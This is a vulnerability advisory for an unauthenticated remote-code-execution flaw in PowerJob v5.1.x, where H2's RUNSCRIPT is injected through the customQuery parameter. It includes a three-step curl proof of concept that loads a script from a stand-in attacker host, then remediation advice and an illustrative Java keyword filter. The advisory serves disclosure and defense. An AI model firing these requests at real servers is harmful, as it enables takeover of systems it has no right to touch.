### Vulnerability Overview

* **Title**: Unauthenticated Remote Code Execution: H2 SQL Injection in `customQuery` Parameter (#1167)
* **Vulnerability Type**: Pre-Auth Remote Code Execution (RCE)
* **Severity**: Critical
* **Affected Versions**: PowerJob v5.1.0 ~ v5.1.2 (all v5.1.x versions, including `latest`)
* **Prerequisites**: No authentication required; exploitable with the default configuration.
* **Attack Vectors**: `/openApi/saveJob`, `/openApi/runJob`, `/instance/detailPlus`

### Root Cause Analysis

1. **OpenApi Not Authenticated by Default**: In `OpenApiInterceptor.java`, the `enableOpenApiAuth` flag defaults to `false`, so every endpoint under `/openApi/*` can be reached without authentication.
2. **Missing Permission Check**: The `getInstanceDetailPlus` method in `InstanceController.java` lacks the `@ApiPermission` annotation, so the `/instance/detailPlus` endpoint has no access control at all.
3. **SQL Injection**: Although the `customQuery` parameter is run through a keyword blacklist, the `RUNSCRIPT` keyword is not filtered, so a remote script can be loaded and executed inside the H2 database.

### Attack Chain and POC

An attacker can craft HTTP requests that use the H2 database's `RUNSCRIPT` statement to load a remote SQL script, which in turn executes system commands.

**Key Exploitation Steps:**

1. **POST `/openApi/saveJob`**: Create a BROADCAST type job (this triggers `HeavyTaskTracker`).
2. **POST `/openApi/runJob`**: Trigger the job execution.
3. **POST `/instance/detailPlus`**: Inject the payload via the `customQuery` parameter to execute `RUNSCRIPT`.
**POC Code (curl commands):**

```bash
# Step 1: Create a job
curl -X POST http://127.0.0.1:8080/openApi/saveJob -H "Content-Type: application/json" -d '{"appId":1,"jobName":"test","jobType":1,"customQuery":"1=1; RUNSCRIPT FROM '\''http://attacker/exp.sql'\'';--"}'

# Step 2: Trigger job execution
curl -X POST http://127.0.0.1:8080/openApi/runJob -H "Content-Type: application/json" -d '{"appId":1,"jobId":1}'

# Step 3: Inject payload (trigger Worker execution)
curl -X POST http://127.0.0.1:8080/instance/detailPlus -H "Content-Type: application/json" -d '{"appId":1,"jobId":1,"customQuery":"1=1; RUNSCRIPT FROM '\''http://attacker/exp.sql'\'';--"}'
```

### Remediation Recommendations

1. **Implement Authentication**: Add the `@ApiPermission` annotation to the `/instance/detailPlus` endpoint so it is covered by the same access control as the other instance endpoints.
2. **Enhance Filtering**: Add H2 database-specific keywords such as `RUNSCRIPT`, `CALL`, and `LINK` to the blacklist filtering mechanism, and reject statement separators so a second statement cannot be chained onto the filter fragment.
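The following is an added example of the second remediation (the extended keyword filter), written here for illustration; it is not PowerJob's own code, and the class name `CustomQueryGuard` and its methods are hypothetical. It checks a `customQuery` fragment for the H2 keywords the advisory names (matched as whole words, case-insensitively, so lowercase or mixed-case spellings are caught) and additionally rejects statement separators and comment markers, since those are what turn a predicate into a second statement:

```java
import java.util.regex.Pattern;

/**
 * Added example, not PowerJob's own code: a guard for the user-supplied
 * customQuery fragment that rejects H2 statements capable of running
 * scripts or reaching outside the database. Names are hypothetical.
 */
public final class CustomQueryGuard {

    // Keywords the advisory recommends denying. \w* after LINK also covers
    // the LINKED form used by H2's CREATE LINKED TABLE. Whole-word,
    // case-insensitive matching so "runscript" or "RunScript" are caught too.
    private static final Pattern DANGEROUS_KEYWORD = Pattern.compile(
            "\\b(RUNSCRIPT|CALL|LINK\\w*)\\b", Pattern.CASE_INSENSITIVE);

    // A filter fragment should be a single predicate. Semicolons and comment
    // markers are how an attacker chains a second statement onto it.
    private static final Pattern STATEMENT_BREAK = Pattern.compile(";|--|/\\*");

    private CustomQueryGuard() {}

    /** Returns true only when the fragment contains no denied keyword or separator. */
    public static boolean isSafe(String customQuery) {
        if (customQuery == null || customQuery.isBlank()) {
            return true; // nothing to filter on
        }
        if (STATEMENT_BREAK.matcher(customQuery).find()) {
            return false;
        }
        return !DANGEROUS_KEYWORD.matcher(customQuery).find();
    }

    /** Throws so a controller can answer HTTP 400 instead of passing the fragment to H2. */
    public static String require(String customQuery) {
        if (!isSafe(customQuery)) {
            throw new IllegalArgumentException("customQuery contains a disallowed H2 statement");
        }
        return customQuery;
    }

    public static void main(String[] args) {
        // Constructed inputs: a legitimate filter predicate, the injection shape
        // from the advisory (with a placeholder host), and a lowercase variant.
        String[] samples = {
                "status = 1 AND app_id = 3",
                "1=1; RUNSCRIPT FROM 'http://example.invalid/x.sql';--",
                "1=1 or runscript from 'x'"
        };
        for (String s : samples) {
            System.out.println(isSafe(s) + "  <-  " + s);
        }
    }
}
```

A denylist like this closes the specific hole the advisory describes, but H2 has other statements and functions that should not be reachable from a filter parameter, so the stronger design is to restrict `customQuery` to an allowlisted grammar (column names from a fixed set, comparison operators, and bound parameters) rather than to keep growing the list of banned words. The guard above is meant to sit in front of `getInstanceDetailPlus` alongside the `@ApiPermission` check, not to replace it.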